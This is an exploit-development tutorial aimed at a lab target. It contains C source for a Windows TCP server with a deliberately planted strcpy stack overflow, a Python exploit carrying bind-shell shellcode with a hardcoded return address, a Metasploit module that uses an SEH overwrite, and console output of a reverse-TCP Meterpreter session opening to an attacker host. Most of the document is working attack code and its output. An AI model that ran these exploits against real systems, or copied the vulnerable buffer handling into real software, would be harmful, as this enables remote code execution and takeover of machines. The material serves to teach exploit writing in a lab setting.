exploit - write metasploit exploit script

Create Vuln Server

Compile the source code with VC6.0 / Dev C++.

#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

void pr( char *str)
{
   char buf[500]="";
   strcpy(buf,str);
}

void sError(char *str)
{
   MessageBox (NULL, str, "socket Error" ,MB_OK);
   WSACleanup();
}

int main(int argc, char **argv)
{

    WORD sockVersion;
    WSADATA wsaData;

    int rVal;
    char Message[5000]="";
    char buf[2000]="";

    // server port: 9000
    u_short LocalPort;
    LocalPort = 9000;

    //wsock32 initialized for usage
    sockVersion = MAKEWORD(1,1);
    WSAStartup(sockVersion, &wsaData);

    //create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

    if(serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");
        return SS_ERROR;
    }

    SOCKADDR_IN sin;
    sin.sin_family = PF_INET;
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;

    //bind the socket
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if(rVal == SOCKET_ERROR)
    {
        sError("Failed bind()");
        WSACleanup();
        return SS_ERROR;
    }

    //get socket to listen
    rVal = listen(serverSocket, 10);
    if(rVal == SOCKET_ERROR)
    {
        sError("Failed listen()");
        WSACleanup();
        return SS_ERROR;
    }

    printf("[+] listening on tcp/9000... \n");

    //wait for a client to connect
    SOCKET clientSocket;
    clientSocket = accept(serverSocket, NULL, NULL);
    if(clientSocket == INVALID_SOCKET)
    {
        sError("Failed accept()");
        WSACleanup();
        return SS_ERROR;
    }

    int bytesRecv = SOCKET_ERROR;
    while( bytesRecv == SOCKET_ERROR )
    {
        //receive the data that is being sent by the client max limit to 5000 bytes.
        bytesRecv = recv( clientSocket, Message, 5000, 0 );

        if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
        {
            printf("\nConnection Closed.\n");
            break;
        }
    }

    //Pass the data received to the function pr
    pr(Message);

    //close client socket
    closesocket(clientSocket);

    //close server socket
    closesocket(serverSocket);

    WSACleanup();

    return SS_OK;
}

---

Stack Overflow

Please exploit vuln-server.exe with stack overflow bug.

#!/usr/bin/env python
# -*- coding: utf8 -*-

import socket


csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ret = csock.connect_ex(("127.0.0.1", 9000))

if (ret == 0):
    junk = "A" * 500
    eip = "\x7B\x46\x86\x7C"   # 7C86467B

    # bad chars: 00 

    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    buf =  "\x90" * 20
    buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
    buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
    buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
    buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
    buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
    buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
    buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
    buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
    buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
    buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
    buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
    buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
    buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
    buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
    buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
    buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
    buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
    buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
    buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
    buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
    buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
    buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
    buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
    buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
    buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
    buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
    buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
    buf += "\x34\x5a\x1e\x23"
    nops = "\x90" * 1500

    payload = junk + eip + buf + nops 

    csock.send(payload)

csock.close()

---

Write MSF exploit script

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh


  def initialize(info={})
    super(update_info(info,
      'Name'            =>  'Custom Vulnable Tcp Server Buffer Overflow',
      'Description'     =>  %q{
          'This module exploits a custom windows tcp server'
      },
      'Author'          =>  [ 'Nixawk' ],
      'License'         =>  MSF_LICENSE,
      'DefaultOptions'  =>  {
                                'EXITFUNC'       => 'process',
                                'AllowWin32SEH'  => true
                            },
      'Payload'         =>  {
        'Space'            => 1400,
        'BadChars'         => "\x00\xFF",
        'StackAdjustment'  => -3500
      },
      'Platform'      => 'win',
      'Targets'       =>
        [
          ['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}]
        ],

      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'June 20 2015'
    ))

    register_options([Opt::RPORT(9000)], self.class)

    end

    def exploit
        # [*] Started reverse handler on 192.168.1.108:4444 
        # [-] Exploit failed: TypeError no implicit conversion of String into Integer
        connect

        sploit = rand_text(target['Offset'])
        sploit << generate_seh_record(target.ret)
        # sploit << make_nops(50) 
        sploit << payload.encoded

        sock.put(sploit)

        handler
        disconnect
    end
end

---

Exploit Vuln Server with MSF

msf exploit(custom_vulnserver) > show options

Module options (exploit/windows/misc/custom_vulnserver):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.105    yes       The target address
   RPORT  9000             yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.108    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 En


msf exploit(custom_vulnserver) > exploit

[*] Started reverse handler on 192.168.1.108:8080 
[*] Sending stage (884270 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000

meterpreter > sysinfo
Computer        : CORELAN-LAB
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : MSHOME
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 

---

References

https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/